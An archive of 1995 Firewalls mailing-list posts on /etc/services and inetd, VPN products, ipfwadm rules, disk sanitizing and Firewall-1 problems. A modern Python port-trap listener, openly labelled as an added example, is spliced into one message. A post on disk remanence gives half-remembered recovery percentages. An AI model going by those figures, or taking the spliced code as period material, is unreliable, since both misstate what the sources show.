Harold March CMC DECnet: AV410A::MARCH Canadian Marconi Company Internet: march@mtl.marconi.ca MIS/IT CompuServe: 76424,3451 TEL: 514-748-3000 ext 4467 FAX: 514-748-3136 From firewalls-owner Fri Aug 4 11:31:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00501 for firewalls-outgoing; Fri, 4 Aug 1995 10:51:18 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00474 for ; Fri, 4 Aug 1995 10:51:14 -0700 From: mulligan@future.incog.com Received: from ns.incog.com(199.190.177.251) by miles via smap (V1.3) id sma000416; Fri Aug 4 10:50:10 1995 Received: from coslabs.incog.com by ns.incog.com (8.6.10/94082501) id KAA20480; Fri, 4 Aug 1995 10:32:13 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA17683; Fri, 4 Aug 1995 11:30:53 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA00549; Fri, 4 Aug 1995 11:30:52 -0600 Message-Id: <9508041730.AA00549@future.incog.com> To: Doug Hughes Cc: dannyc@gmap.leeds.ac.uk, firewalls@greatcircle.com Subject: Re: /etc/services on Solaris Reply-To: mulligan@incog.com In-Reply-To: Your message of "Thu, 03 Aug 1995 12:35:39 CDT." Date: Fri, 04 Aug 1995 11:30:52 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I'm inclined to take all of these out. I'm slighly wary as to whether I'm > >going to shoot myself in the foot by doing so however, as I don't really > >know what half of these do! We don't have any need for X.400 mail; I'm > >not running a printer or NFS from my firewall either. And needless to > >say I'm not running Ingres on it!!! Anyone comment upon whether I should > >keep any of these ? > > There's no need to take them out. Taking them out of /etc/services > doesn't mean anything other than you can't resolve a name to port > number pair. 
In my opinion, you would be doing yourself a disservice > if it ever became necessary to figure out what a service was when > you were being probed on that port. > Instead, why not set up something that listens on these services > ports and reports the access if you know that no legitimate traffic > could possibly come on these ports? Actually taking entries out of the /etc/services file on Solaris does do something. It means that you can't start a service on that port from inetd. Inetd will only use a service name (not a port number) in the first (service-name) field. This name must be listed in the /etc/services file or in a NIS or NIS+ map if so configured. geoff From firewalls-owner Fri Aug 4 12:05:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00931 for firewalls-outgoing; Fri, 4 Aug 1995 11:01:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00896 for ; Fri, 4 Aug 1995 11:01:19 -0700 Received: from snm.snm.com(199.35.155.1) by miles via smap (V1.3) id sma000756; Fri Aug 4 11:00:43 1995 Received: from gypsy.snm.com (gypsy.snm.com [199.35.155.2]) by snm.com (8.6.9/8.6.9) with SMTP id NAA26012; Fri, 4 Aug 1995 13:54:54 -0400 Date: Fri, 4 Aug 1995 13:52:39 -0400 (EDT) From: "David C. Blankenhorn" To: Steve Lodin cc: Firewalls@GreatCircle.COM Subject: Re: Virtual Private Network Enabling Technologies In-Reply-To: <9508031420.ZM16768@kocrsw26.delcoelect.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know of a couple of commercial products that provide this sort of coverage. TIS's Gauntlet http://www.tis.com/ Raptor's Eagle http://www.raptor.com/ Sun's SunScreen http://www.sun.com/ I'm sure there are others. Of the three, I have only worked with the Raptor product for securing a connection between a PC on a public ISP and a protected network. 
This is also suppossed to be able to connect protected LANs, but I haven't used it for this purpose ... yet. As for Gauntlet and SunScreen, I am not sure. However, Sun's propaganda makes it look like it would handle LAN to LAN very nicely (if you have a `Screen at each remote site $$$). Cheers, David C. Blankenhorn -=-=-=-=-=-=-=-=-=-=-=-=-=- Smoke N' Mirrors -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (703) 318-1440 1165 Herndon Parkway #200 david@snm.com - Services For Systems Integration - Herndon, VA 22070 On Thu, 3 Aug 1995, Steve Lodin wrote: > > A couple of weeks ago we had a discussion about virtual private networks > running on top of the Internet. Does anyone have a list or web site with the > enabling technologies to implement VPNs? I'll take any references including > white papers and commercial recommendations. From firewalls-owner Fri Aug 4 12:10:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02786 for firewalls-outgoing; Fri, 4 Aug 1995 11:34:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02726 for ; Fri, 4 Aug 1995 11:33:50 -0700 Received: from quake.xnet.com(198.147.221.34) by miles via smap (V1.3) id sma002670; Fri Aug 4 11:33:03 1995 Received: from davesbbs.UUCP by quake.xnet.com (8.6.11/XNet-1.2R) with UUCP id NAA09813 for firewalls@greatcircle.com; Fri, 4 Aug 1995 13:31:53 -0500 Received: by davesbbs.com; Fri, 04 Aug 1995 10:35:37 Message-ID: <1246@davesbbs.com> Reply-To: dave@davesbbs.com (Dave) To: firewalls@greatcircle.com Date: Fri, 04 Aug 1995 10:35:37 Subject: Mailing List From: dave@davesbbs.com (Dave) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My system is receiving message from your mailing list. I Emailed you about this before and you sent me this instruction on how to remove it. However I have no idea what the name of this mailing list is or how to remove it. 
I made several attempts to remove it but it jus told me I didn't something about an invalid name. Whatever mailing list I am on is cluttering up my Email database with unaddressed messages and causing problems with my system. Is there any way you could remove it for me? I never joined any mailing lists so I have a feeling one of the users might have. However I have no way of knowing who and can't seem to find any info about this. I would appreciate any help you can give me in this matter. Thanks, David Smith This has been an D A V E ' S P L A C E VirtualNET @1334607 OFFICIAL EMAIL (334) 213-0554 24 hours FidoNET 1:375/201 written at... @davesbbs.com ACNET 244:300/1 *CC: firewalls-owner @greatcircle.com Internet *CC: firewalls @greatcircle.com Internet *CC: firewalls_owner @greatcircle.com Internet From firewalls-owner Fri Aug 4 12:10:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00403 for firewalls-outgoing; Fri, 4 Aug 1995 10:49:21 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00369 for ; Fri, 4 Aug 1995 10:49:14 -0700 Received: from mwunix.mitre.org(128.29.154.1) by miles via smap (V1.3) id sma000353; Fri Aug 4 10:48:19 1995 Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id NAA00207; Fri, 4 Aug 1995 13:47:07 -0400 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA09134; Fri, 4 Aug 95 13:45:14 EDT Date: Fri, 4 Aug 95 13:45:13 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Steve Lodin" From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Re: Virtual Private Network Enabling Technologies Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following products are able to encrypt network traffic based on source/destination address. Some are also able to encrypt based on the type of network service (port). 
As a result, sites could create a Virtual Private Network (VPN) on the Internet. Note that one would need two boxes in order to provide for site-to-site encryption over the Internet. ++If your product is missing, please let me know. Products are: ANS InterLock Service - Supports optional DES software. Brimstone Firewall Product Milkyway Black Hole - Supports modified (proprietary) DES algorithm (DES++). Cisco Systems/Cylink - Software solution (part of Cisco operating system) later this calendar year, hardware board to follow. Checkpoint Firewall-1 - Encryption support planned for future release. Hughes NetLOCK - Supports DES and cXOR. LSLI's Portus Firewall IRE - Available later this calendar year. KarlBrouter - Supports software DES. Network Systems Corp. (NSC) - Security Router offers encryption using IDEA, DES, Triple DES, and high speed proprietary algorithms. Morningstar EXPRESS Router - Supports DES. Motorola Network Encryption System (NES) Raptor Systems - Will be offering DES encryption package. Semaphore Communications - Network Encryption Unit (NEU), supports DES. swIPe - Publicly available. Sun Sunscreen SPF-100. - Supports multiple encryption algorithms. TIS Gauntlet 3.0 - Supports software DES option and hardware DES board. Includes resellers of Gauntlet. (Includes licensed Gauntlet products) UUNET LanGuardian - Combination of hardware and software DES. 
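The /etc/services thread above makes two points worth keeping together: Geoff's, that inetd resolves the service-name field through /etc/services (so a removed entry means inetd cannot start that service), and Doug's, that a listener on the unused ports which simply reports the access tells you when you are being probed, and on which service. The following is an added example illustrating that idea in Python; it is not klaxon and not code from anyone in the thread. The PortTrap and parse_services names are mine, SAMPLE_SERVICES is a constructed excerpt in /etc/services format, and the demo binds an ephemeral localhost port because the real low-numbered service ports need privilege.

```python
"""Port trap: bind to service ports you have shut off, record every TCP
connection attempt, and name the port from a services table so the log line
says what was being probed.  Constructed example for the list thread; not
klaxon and not code from any list member."""
import select
import socket
import threading
import time
from datetime import datetime, timezone

# Constructed excerpt in /etc/services format: name  port/proto [aliases]
SAMPLE_SERVICES = """\
ftp         21/tcp
telnet      23/tcp
smtp        25/tcp
sunrpc      111/tcp
sunrpc      111/udp
ingreslock  1524/tcp    # the Ingres port the original poster asked about
"""


def parse_services(text):
    """Map (port, proto) -> service name from /etc/services-style lines."""
    table = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()      # drop comments
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port, proto = fields[1].split("/", 1)
        table[(int(port), proto)] = fields[0]
    return table


class PortTrap:
    """Accept TCP connections on the given ports, log each one, close it."""

    def __init__(self, ports, services, host="127.0.0.1"):
        self.host = host
        self.ports = ports
        self.services = services
        self.events = []              # one dict per connection attempt
        self._sockets = []
        self._stop = threading.Event()
        self._thread = None

    def start(self):
        for port in self.ports:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((self.host, port))     # port 0 = ephemeral, used by demo()
            s.listen(8)
            self._sockets.append(s)
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def bound_ports(self):
        return [s.getsockname()[1] for s in self._sockets]

    def _serve(self):
        while not self._stop.is_set():
            ready, _, _ = select.select(self._sockets, [], [], 0.1)
            for s in ready:
                conn, peer = s.accept()
                port = s.getsockname()[1]
                self.events.append({
                    "time": datetime.now(timezone.utc).isoformat(),
                    "peer": peer[0],
                    "port": port,
                    "service": self.services.get((port, "tcp"), "unknown"),
                })
                conn.close()  # nothing is served; the attempt is the signal

    def stop(self):
        self._stop.set()
        if self._thread is not None:
            self._thread.join()
        for s in self._sockets:
            s.close()


def format_event(e):
    """One syslog-style line per attempt."""
    return "%s porttrap: connection from %s to port %d (%s)" % (
        e["time"], e["peer"], e["port"], e["service"])


def demo(timeout=5.0):
    """Trap one ephemeral localhost port, connect to it once, return events."""
    trap = PortTrap([0], parse_services(SAMPLE_SERVICES))
    trap.start()
    port = trap.bound_ports()[0]
    socket.create_connection(("127.0.0.1", port)).close()
    deadline = time.time() + timeout
    while time.time() < deadline and not trap.events:
        time.sleep(0.05)
    trap.stop()
    return trap.events


if __name__ == "__main__":
    for event in demo():
        print(format_event(event))
```

In production you would hand the listener the real /etc/services text, bind it to the ports that have no legitimate traffic, and send format_event output to syslog rather than print it; because the trap only accepts and closes, a probe gets no banner and no service, just a log line naming the port.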
From firewalls-owner Fri Aug 4 12:30:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04714 for firewalls-outgoing; Fri, 4 Aug 1995 12:22:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04635 for ; Fri, 4 Aug 1995 12:22:04 -0700 Received: from dg-rtp.rtp.dg.com(128.222.1.2) by miles via smap (V1.3) id sma004605; Fri Aug 4 12:21:27 1995 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA16999; Fri, 4 Aug 1995 15:19:55 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA20427; Fri, 4 Aug 1995 15:19:44 -0400 Message-Id: <9508041919.AA20427@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Fri, 4 Aug 1995 15:18:50 -0500 Subject: InfoSec policies made easy? Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thought this might be relevant, as this topic comes up from time to time. Feel free to comment. Policies aren't my forte, so please direct your responses to the list. I was cleaning up around my desk when I came across a promo entitled "Information Security Policies Made Easy". Dang near forgot about this. I'll forward noteworthy points for comment: - 600+ policies with diskette (PC/Mac) - authored by Charles Cresson Wood - abbr. 
TOC: - Management Summary - Policy Development Instructions - Specific Policies - Logical Security - Software Security - Software Development and Change Control - Data Security - Communications Security - Managerial Security - Administrative Security - Personnel Security - Organizataional Structure - Physical Security - Physical Access Security - Comprehensive List of Information Security Standards - Information Security Policy References - Brief Information Security Policy Statement - Appendices Then there's a sniplet from LAN Times (Dec.9/91). Also, the usual blessings from important people who have a lot at stake. The price is (or at least *was*) US$495. If the general feeling is a positive one, I'll post The Gory Commercial Details. :P -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Fri Aug 4 12:43:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00402 for firewalls-outgoing; Fri, 4 Aug 1995 10:49:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00368 for ; Fri, 4 Aug 1995 10:49:14 -0700 Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma000357; Fri Aug 4 10:49:11 1995 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id MAA22888; Fri, 4 Aug 1995 12:47:54 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id MAA29808; Fri, 4 Aug 1995 12:47:51 -0500 Date: Fri, 4 Aug 1995 12:47:51 -0500 Subject: Re: /etc/services on Solaris To: mulligan@incog.com Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <9508041730.AA00549@future.incog.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> There's no need to take them out. 
Taking them out of /etc/services >> doesn't mean anything other than you can't resolve a name to port >> number pair. In my opinion, you would be doing yourself a disservice >> if it ever became necessary to figure out what a service was when >> you were being probed on that port. >> Instead, why not set up something that listens on these services >> ports and reports the access if you know that no legitimate traffic >> could possibly come on these ports? > >Actually taking entries out of the /etc/services file on Solaris does do >something. It means that you can't start a service on that port from >inetd. > >Inetd will only use a service name (not a port number) in the first >(service-name) field. This name must be listed in the /etc/services >file or in a NIS or NIS+ map if so configured. > > geoff I had assumed that they had already been extracted from inetd and that the services was just an extra measure. (That's what I would do, extract out of inetd.) After all, if you're running something like NIS or NIS+, taking them out of /etc/services really does nothing at all. I still think setting a trap is a better alternative than complete removal. That way you KNOW you're being probed. PS - I've updated the source for klaxon to handle both tcp and udp and syslog any connection attempts. For relevant information see http://www.eng.auburn.edu/users/doug/second.html It does not handle rpc/tli stuff yet. 
-- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu "Real programmers use cat > file.as" From firewalls-owner Fri Aug 4 12:51:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03766 for firewalls-outgoing; Fri, 4 Aug 1995 11:58:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03750 for ; Fri, 4 Aug 1995 11:57:59 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma003744; Fri Aug 4 11:57:02 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA28426; Fri, 4 Aug 1995 11:51:12 -0700 Received: from beach.sctc.com(192.55.214.50) by mycroft via smap (V1.3mjr) id sma028424; Fri Aug 4 11:50:59 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id OAA17946 for ; Fri, 4 Aug 1995 14:00:13 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id OAA17940 for ; Fri, 4 Aug 1995 14:00:13 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id NAA00260 for ; Fri, 4 Aug 1995 13:55:21 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id NAA10916; Fri, 4 Aug 1995 13:55:20 -0500 Date: Fri, 4 Aug 1995 13:55:20 -0500 From: Rick Smith Message-Id: <199508041855.NAA10916@shade.sctc.com> To: firewalls@greatcircle.com Subject: Re: the ongoing debate.. Newsgroups: security.firewalls References: <9508020323.AA02983@tis.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus writes: > If my machine were the launch console for H-bombs I'd >strip it to a point of beyond uselessness, to secure it! 
:) For what it's worth, I've talked to nuclear controls people about assurance, comparing it to our experience with A1 assurance processes for trusted system development. They have us beat, for sure. Of course, they're sending exactly *ONE* message with very high assurance, and that changes the texture of the problem a bit. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Aug 4 13:00:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05837 for firewalls-outgoing; Fri, 4 Aug 1995 12:46:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05793; Fri, 4 Aug 1995 12:46:21 -0700 Received: from nsco.network.com(129.191.1.1) by miles via smap (V1.3) id sma005779; Fri Aug 4 12:46:02 1995 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA28484; Fri, 4 Aug 95 15:03:42 CDT Received: by mnbp.network.com with Microsoft Mail id <3022786F@mnbp.network.com>; Fri, 04 Aug 95 14:43:43 CDT From: Craig McLellan To: firewalls-owner , firewalls Subject: RE: Sparc2 as a 3-way packet filter? Date: Fri, 04 Aug 95 14:43:00 CDT Message-Id: <3022786F@mnbp.network.com> Encoding: 32 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd love to know what performance you get out of this?? RGRDS....clm ---------- Subject: Sparc2 as a 3-way packet filter? Date: Thursday, August 03, 1995 1:57PM Hi, all: I'm looking into converting an idle Sparc-2 with 3 Ethernet interfaces into a packet-filtering firewall/router connecting 3 local nets for IP traffic only. Buying more hardware is not an option. The 3 networks are: a DMZ with our Internet link, another router and a bastion host; a buffer net with routers to multiple mutually suspicious clients resources shared between the client and our engineers (i.e., NFS servers); and the internal company LAN with <50 heterogeneous hosts. 
No traffic will pass directly from one external net to another, or to the
internal net, only to servers in the buffer net or the DMZ bastion host. We
will control all the "edge" routers on the buffer and DMZ nets.

I've picked up the ipfilter package from Darren Reed, which looks to be
pretty much what I think I need, and the newest version of screend I was
able to find (dated April 1990). Any experiences with either of these two
packages, or pointers to other SW solutions, would be appreciated.

Thanks,

+----------------------------------------------------------------------+
| Dan Murphy | CWA | Los Gatos, Calif | 408-358-1529 | dmurphy@cwa.com |
+----------------------------------------------------------------------+

From firewalls-owner Fri Aug 4 13:37:33 1995
Message-Id: <9508041819.AA18327@tis.com>
From: Frederick M Avolio
X-Organization: Trusted Information Systems, Inc.
X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363
To: Harold March
Cc: Firewalls@greatcircle.com
Subject: Re: MorningStar SecureConnect
In-Reply-To: Your message of Fri, 04 Aug 95 12:23:54 -0400. <01HTOB1O6YF68Y5GXM@av410a.mtl.marconi.ca>
Date: Fri, 04 Aug 95 14:19:05 -0400

I won't enter into a debate about routers vs. application gateways vs.
circuit gateways vs.
hybrids (like DEC). Any of you who have heard me speak, or know anything
about the FWTK or the Gauntlet firewall know where I stand. If you believe
that a filtering router is less secure then, yes, this will be a situation
of marrying two different levels of security and so the overall safety of
your network will drop to the lower of the two. St. Paul, in his second
letter to the Corinthians, (6:14) warns about being unequally joined like
this, although my memory is a bit faulty and it is possible that he was
not talking about security perimeters.

I'd want a firewall between their network and mine...

Fred

> One of our remote sites wishes to obtain their own Internet connect
> and wants to use a MorningStar SecureConnect "firewall". As far as
> I can tell this is just a filtering router which does not give me
> the "warm & fuzzies" since this can probably be compromised more
> easily than the DEC SEAL firewall we have set up. Am I wrong to
> think that this is going to backdoor our net or should I think about
> firewalling off their site? ...
From firewalls-owner Fri Aug 4 14:10:15 1995
Date: 4 Aug 1995 14:19:22 -0700
From: "Rich Helton"
Subject:
To: firewalls@greatcircle.com

list

From firewalls-owner Fri Aug 4 14:23:57 1995
From: "Tucker, R., SrA, 28CS/SCSNS"
To: Scott Barman
Cc: "'firewalls-owner'"
Subject: RE: Sanitizing SCSI disks
Date: Fri, 04 Aug 95 11:57:00 PDT
Message-Id: <30226D6B@cs28-1.ellsworth.af.mil>

Because of magnetic remanence.
I'm not sure how much you're familiar about how info gets written to disks,
so please excuse me if you already know how this works:

A small positive or negative current gets sent to the disk through the
heads, charging the surface of the disk. Like ALL electrical currents, it
flows in a wave pattern (frequency). The overwrite also flows in the same
wave pattern, BUT NOT IN THE EXACT LOCATION AS THE ORIGINAL WAVE PATTERN.
Approximately 40% of the waves match after the first overwrite, leaving
about 60% you could still bring back, provided you have the right software
(some cases hardware is also necessary...I'm not the REAL expert on this,
but I have seen how OSI does this.) I forget the actual algorithm on how
much gets erased at each pass, but I do remember on the chart that after
the first pass, approx. 60% could still be recovered, and it went all the
way down to after the 99th pass, approx. .06% could still be recovered.
The algorithm is different depending on what media you're sanitizing (as
well as about 50 other different factors), but the above figures are for
hard disks.

Wipedisk DOES overwrite bad sectors, so they're not a problem as long as
you're using it. (There used to be another program approved for
sanitizing, I can't remember the name, but it was a M$ product, that lost
its approval because it didn't overwrite bad sectors. Look through your
APDL around the April - June 93 time frame in the Products no longer
approved section, if you're curious.)

However, if you have a CRASHED Hard Disk, then you'll have to destroy it,
since there's no way to ensure the heads are actually doing anything to
the disk.

Another thing you can do, if it's possible to separate your disk (the
little case with the platters) from the controller board (or anything
else you don't want zapped) is to run it through a degausser. Now on this
one you'll have to look up the length of time, Oehrsteds (sp?), and for
what coercivity, etc. as they change from HD to HD.
Glad I can finally help someone out on this list. :*)

Have a good one...

SrA Tucker

----------
From: Scott Barman
To: Tucker, R., SrA, 28CS/SCSNS
Subject: RE: Sanitizing SCSI disks
Date: Friday, August 04, 1995 12:53PM

On Fri, 4 Aug 1995, Tucker, R., SrA, 28CS/SCSNS wrote:

> If you're a civilian, (and don't have to follow those requirements) just
> overwrite with Wipedisk three times. If what's on there makes you *THAT*
> paranoid, use Wipedisk 99 times. :*)

Question: why three times? Wouldn't one do the trick?

scott barman

--
scott barman            DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network
security just as the original PC and BASIC was the cause of the
de-evolution of programming."

From firewalls-owner Fri Aug 4 14:35:24 1995
Message-Id: <199508041842.NAA01490@igate.merakusa.com>
Date: Fri, 04 Aug 1995 14:04:35 -0600
To: firewalls@GreatCircle.COM
From: Larry Barras
Subject: FW Developer's Consortium

Here's an interesting snippet from the news. You can find the full article
on various news or online services.

<<<<<
CARLISLE, Pa.--(BUSINESS WIRE)--Aug. 3, 1995--The National Computer
Security Assn.
(NCSA) has organized the Firewall Product Developers' Consortium (FWPD), to
bring together the major vendors of network and Internet firewall products.
The purpose of the consortium is to decrease confusion about computer
firewall products, enhance quality, provide a common terminology and
testing methodology and improve the ease of use and security of firewall
products.

...[article snipped]
>>>>>>

Larry Barras
Merak Projects, Inc.

From firewalls-owner Fri Aug 4 14:38:45 1995
Date: 4 Aug 1995 14:54:58 -0700
From: "Rich Helton"
Subject:
To: snmp@psi.com
Cc: firewalls@greatcircle.com, host-conf@sol.cs.buchnell.edu,
    listserv@sunsite.unc.edu, snmp2@tis.com, socks@syl.dl.ncc.com

lists

From firewalls-owner Fri Aug 4 14:40:36 1995
X-Sender: markl@rugrat.glyphic.com
Message-Id:
Date: Sat, 5 Aug 1995 00:59:43 -0700
To: quito@constructa.cl (Francisco Javier cabezas)
From: markl@glyphic.com (Mark Lentczner)
Subject: Re: about ipfwadm in Linux
Cc: Firewalls@GreatCircle.COM

>What are "the blocking rules", "the forwarding rules" and
>"the IP accounting rules " ???

Blocking rules are applied to all packets that arrive on any interface and
to packets generated locally. Forwarding rules are applied to packets that
have passed the blocking rules and are being routed by the kernel to
another machine on the net. Accounting rules are simply for counting
packets and are applied just before delivering locally and just before
transmitting on an interface (either due to forwarding or local packets).

Graphically:

   interface --> Blocking --+--> Accounting --> local process
                            |
                            +--> Forwarding --> Accounting --> interface

   local process --> Blocking --> Accounting --> interface

Note that the decision to forward is made after the blocking filter.

In Linux, the kernel filter rules can be made interface specific, which
enables one to create no-spoofing rules. There is also the Masquerade
option, which lets you have a local net of IPs that never make it out to
the Internet (see RFCs 1597 & 1627). In this case, masquerading takes
place as:

   intf. --> Bl'king --+--+--> Acc'ting --> local process
                       |  |
                       |  +--> De-Masq. --> Fw'rding --> intf.
                       |
                       +--> Fw'rding --> Masq. --> intf.

- Mark

-------------------
Mark Lentczner
Glyphic Technology
1209 Villa Street
Mtn.
View, CA 94041
415/964-5311
markl@glyphic.com
http://www.glyphic.com/

From firewalls-owner Fri Aug 4 15:34:59 1995
From: Alex Sharpe
To: "'firewalls-owner'"
Subject: Firewalls for Dynamic Routing
Date: Fri, 04 Aug 95 17:25:00 PDT
Message-Id: <3022BA9F@bass.rssi.com>

Anyone know of a Firewall product that does dynamic routing? In particular,
we are looking for a product that will receive a packet and then from
analyzing the content map it to another IP address only known within the
local enterprise.

Alex Sharpe
Rapid System Solutions Inc.
(410) 312-1678
Alex.Sharpe@rssi.com

From firewalls-owner Fri Aug 4 15:35:05 1995
Date: Fri, 4 Aug 1995 16:43:01 -0500
From: Rick Smith
Message-Id: <199508042143.QAA18193@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Proofs of Security Properties

Sorry I wasn't around for that terrific thread on MLS systems. I don't
have much to add, but I'll quibble with Marcus' comments on proofs..

Ray Kaplan said:

>>>The only thing I'd add is that the "make them be treated differently" be
>>>stiffened to something like "provably force them to be treated according
>>>to the security policy."

Marcus replied:

>> Nope. Forget proofs. Come on. The proof guys have been
>>ploughing that field for years and have come up empty.
>>The reality
>>is that proofs don't scale well with complexity, and in case you
>>haven't noticed, every release of every program is 10% larger and
>>more complex than the previous. The proofnicks have had their turn
>>and it's been a dead loss.

Proofs may be "down" but don't count them out yet. It's been harder than
the pundits expected to field a highly assured system, and the assurance
hasn't had the coverage that people expected. It covers design flaws that
contradict formally specified security requirements. That's not -all-
security requirements for a usable system, but it's worthwhile if it
covers -critical- security requirements.

Can the formal assurance effort find bugs in a system design? The answer
is Yes. Will it find *all* bugs? No more than any other technique. The
tradeoff is always mission and threat against the costs of
countermeasures. Formal assurance is an expensive countermeasure against
design flaws. Customers will pay for it if they worry enough about
security requirements that can be fought with formal assurance.

Will commercial customers pay for it? It all depends on how the public
discourse on threats evolves over the years. It may in fact be "dead"
till the end of the decade/century, but then, maybe not.

If formal assurance falls on the "sublime" side of bug finding, then
perhaps public challenges fall on the other end. In both cases the
objective is the same: Find Bugs. In our experience here at Secure
Computing, both techniques have been Very Effective. So far, only Uncle
Sam is willing to pay for formal assurance.

Ray Kaplan continued:

>Yep, but I think I may have misled you. The only "proofs" that I require
>when I do a security assessment is that the security policy is actually
>implemented in a way that actually supports the business goals that are
>supposed to underpin the thing in the first place! I'm not a math or
>crypto or trusted system or defense guy.
>I'm only asking how a given mix
>of security features meets the problems that it was deployed to solve.

How do you tell for sure if a given mix of security features meets the
problems it was deployed to solve? A rhetorical question, of course. You
apply a mixture of logic, common sense, and experience.

The formal proof techniques were stuck into the Orange Book because people
found that you couldn't create effective mandatory access control simply
by slapping labels into the OS. Common sense and experience supported
that approach, since they needed to distinguish between different levels,
and that's what the labels did. As we now know, that generally made
attacks easier, since valuable information was conveniently marked.

Hey, formal assurance is expensive. But when I look at the hot backup
disaster recovery sites paid for by big companies that have a lot to
lose, I realize that formal security assurance might not always be "too
expensive for commercial security." They'll pay big bucks, but only after
a few goats have been slaughtered.

Rick.
smith@sctc.com       secure computing corporation

From firewalls-owner Fri Aug 4 16:36:01 1995
From: strata@virtual.net
Date: Fri, 4 Aug 95 16:11:22 PDT
Reply-To: strata@virtual.net
To: firewalls@greatcircle.com
Subject: Firewall-1 bugs/specifications?
Message-Id:

In looking at Firewall-1, it seems that (in the hour+ of messing with
it) there is no way to allow for things like ftp-data or domain zone
transfers.
I tried to create a service object that would accept requests from machine
A high-numbered TCP ports to machine B port 20 (ftp-data) and couldn't do
so, even when I quit fwui and added it to objects.C by hand. When I
restarted fwui and installed the filter, the new ftp-data object I had
created was ineffectual, and the "source port range" fields had my numbers
but were grayed out. FW-1 seems only to like source port ranges for udp
objects, I haven't been able to get them to work on tcp objects. This is
unacceptable.

The create objects handlers are extremely finicky, and insist sometimes
that they have not been supplied with an object type or name at random.
Often closing and reopening the app itself, or the object window, is the
only fix.

Am I missing something here, like a later release than 1.0.7c? Have other
folks successfully built huge hairy filters with tcp source port ranges
and happy joyful packets bounding gracefully between the interfaces?
Should I build up some more forehead calluses banging my head against the
